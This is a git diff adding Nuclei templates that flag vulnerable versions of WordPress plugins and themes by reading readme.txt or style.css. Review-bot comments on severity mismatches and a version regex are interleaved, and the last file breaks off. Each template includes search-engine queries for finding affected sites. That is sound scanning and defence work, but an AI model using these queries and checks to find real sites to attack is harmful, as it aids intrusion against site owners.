diff --git a/poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml b/poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml new file mode 100644 index 0000000000..d29acfc8d2 --- /dev/null +++ b/poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml @@ -0,0 +1,59 @@ +id: wp-jobsearch-03c799c8c1a4335310c615dc29112568 + +info: + name: > + JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-jobsearch/" + google-query: inurl:"/wp-content/plugins/wp-jobsearch/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-jobsearch,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-jobsearch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml b/poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml new file mode 100644 index 0000000000..6949c1b300 --- /dev/null +++ b/poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a + +info: + name: > + Arkhe Blocks <= 2.22.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Arkhe Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.22.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1079282d-3183-4190-8a54-d6085d27935a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-38675 + metadata: + fofa-query: "wp-content/plugins/arkhe-blocks/" + google-query: inurl:"/wp-content/plugins/arkhe-blocks/" + shodan-query: 'vuln:CVE-2024-38675' + tags: cve,wordpress,wp-plugin,arkhe-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arkhe-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arkhe-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.22.1') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml b/poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml new file mode 100644 index 0000000000..59b6633220 --- /dev/null +++ b/poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml 
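Review bot: `severity: low` contradicts the template's own `cvss-score: 6.4` (CVSS v3.1 Medium), so consumers filtering by severity will under-rank the finding; the same mismatch is in CVE-2024-43263 and CVE-2024-43352 (6.4 marked low), most sharply in CVE-2024-43281 (8.8 marked low), and in the other direction in CVE-2024-43242 and CVE-2024-43354 (8.1 marked critical). Derive `severity` from the score, here `severity: medium`, and update the trailing element of `tags` to match. Separately, every one of these new CVE templates sits under `poc/sql/` although none of them describes SQL injection; a directory matching the vulnerability class would keep the repository layout meaningful.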
@@ -0,0 +1,59 @@ +id: CVE-2024-43241-808351d5b94024e25294db4171fbaa2f + +info: + name: > + Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 12.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43241 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43241' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml b/poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml new file mode 100644 index 0000000000..15b2f241bc --- /dev/null 
+++ b/poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f + +info: + name: > + Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Indeed Membership Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 12.6 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43242 + metadata: + fofa-query: "wp-content/plugins/indeed-membership-pro/" + google-query: inurl:"/wp-content/plugins/indeed-membership-pro/" + shodan-query: 'vuln:CVE-2024-43242' + tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-membership-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 12.6') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml b/poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml new file mode 100644 index 0000000000..16a787d620 --- /dev/null +++ b/poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43247-0624f0bab17c71db9707db1533c1022b + +info: + name: > + WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.2-revision-5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43247 + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:CVE-2024-43247' + tags: cve,wordpress,wp-plugin,whmpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file 
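Review bot: The extractor regex `(?mi)Stable tag: ([0-9.]+)` stops at the first non-numeric character, so a Stable tag such as `6.2-revision-5` is captured as `6.2`, and `compare_versions(version, '<= 6.2-revision-5')` then compares a plain numeric version against a constraint with a non-numeric suffix; how the DSL's version handling treats `-revision-5` (prerelease or parse failure) should be confirmed, because either outcome can make the match fail or succeed for the wrong releases. Widen the capture in both extractors, `"(?mi)Stable tag: ([0-9A-Za-z.-]+)"`, and verify the comparison against the fixed release before relying on this template.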
diff --git a/poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml b/poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml new file mode 100644 index 0000000000..74b098c79e --- /dev/null +++ b/poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c + +info: + name: > + Clearfy Cache <= 2.2.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43260 + metadata: + fofa-query: "wp-content/plugins/clearfy/" + google-query: inurl:"/wp-content/plugins/clearfy/" + shodan-query: 'vuln:CVE-2024-43260' + tags: cve,wordpress,wp-plugin,clearfy,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clearfy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml b/poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml new file mode 100644 index 0000000000..5e8eea816e --- /dev/null +++ b/poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43263-239fd68ccb4495d13837323dbe18444e + +info: + name: > + Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Visual Composer Starter theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43263 + metadata: + fofa-query: "wp-content/themes/visual-composer-starter/" + google-query: inurl:"/wp-content/themes/visual-composer-starter/" + shodan-query: 'vuln:CVE-2024-43263' + tags: cve,wordpress,wp-theme,visual-composer-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-composer-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml b/poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml new file mode 100644 index 0000000000..b45504476a --- /dev/null 
+++ b/poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3 + +info: + name: > + Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43276 + metadata: + fofa-query: "wp-content/plugins/orbisius-child-theme-creator/" + google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/" + shodan-query: 'vuln:CVE-2024-43276' + tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "orbisius-child-theme-creator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.4') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml b/poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml new file mode 100644 index 0000000000..4be58a26c1 --- /dev/null +++ b/poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5 + +info: + name: > + Salon booking system <= 10.8.1 - Unauthenticated Open Redirect + author: topscoder + severity: medium + description: > + The Salon Booking System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 10.8.1. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43280 + metadata: + fofa-query: "wp-content/plugins/salon-booking-system/" + google-query: inurl:"/wp-content/plugins/salon-booking-system/" + shodan-query: 'vuln:CVE-2024-43280' + tags: cve,wordpress,wp-plugin,salon-booking-system,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "salon-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.8.1') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml b/poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml new file mode 100644 index 0000000000..dee8b7e53f --- /dev/null +++ b/poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10 + +info: + name: > + Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Void Elementor Post Grid Addon for Elementor Page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3 via the 'display_type' attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43281 + metadata: + fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-43281' + tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 
"void-elementor-post-grid-addon-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml b/poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml new file mode 100644 index 0000000000..7774d0c164 --- /dev/null +++ b/poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43288-65d9db817865efa08483ff84c1215bb9 + +info: + name: > + wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The wpForo Forum plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.3.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43288 + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:CVE-2024-43288' + tags: cve,wordpress,wp-plugin,wpforo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml b/poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml new file mode 100644 index 0000000000..7b91ea19d5 --- /dev/null +++ b/poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753 + +info: + name: > + Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure + author: topscoder + severity: low + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.31 via the h5vp_export_data() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract potentially sensitive information from exports. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43319 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-43319' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.31') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml b/poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml new file mode 100644 index 0000000000..c90099f47f --- /dev/null +++ b/poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4 + +info: + name: > + GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The GivingPress Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43352 + metadata: + fofa-query: "wp-content/themes/givingpress-lite/" + google-query: inurl:"/wp-content/themes/givingpress-lite/" + shodan-query: 'vuln:CVE-2024-43352' + tags: cve,wordpress,wp-theme,givingpress-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "givingpress-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.6') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml b/poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml new file mode 100644 index 0000000000..3c3e731a8d --- /dev/null +++ b/poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb + +info: + name: > + myCred <= 2.7.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.7.2 via deserialization of untrusted input from the 'data' parameter This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-43354 + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:CVE-2024-43354' + tags: cve,wordpress,wp-plugin,mycred,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file 
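Review bot: `severity: critical` and the `critical` tag overstate the template's own `cvss-score: 8.1` (vector `AC:H`), which is High, not Critical, under CVSS v3.1 — and the description itself says no known POP chain exists in the plugin, so I'd set `severity: high` and `tags: cve,wordpress,wp-plugin,mycred,high`. The description is also missing a sentence break: `... from the 'data' parameter This makes it possible ...` should read `... from the 'data' parameter. This makes it possible ...`. As with the neighbouring templates, this is a PHP object injection check committed under `poc/sql/`, and the readme `Stable tag` fingerprint never sends the `data` parameter, which the description should state.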
diff --git a/poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml b/poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
new file mode 100644
index 0000000000..5c5a9860fc
--- /dev/null
+++ b/poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069 + +info: + name: > + WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions + author: topscoder + severity: low + description: > + The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform various feed actions, such as deleting a feed, duplicating a feed, and changing the status of a feed. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7258 + metadata: + fofa-query: "wp-content/plugins/wp-product-feed-manager/" + google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/" + shodan-query: 'vuln:CVE-2024-7258' + tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: 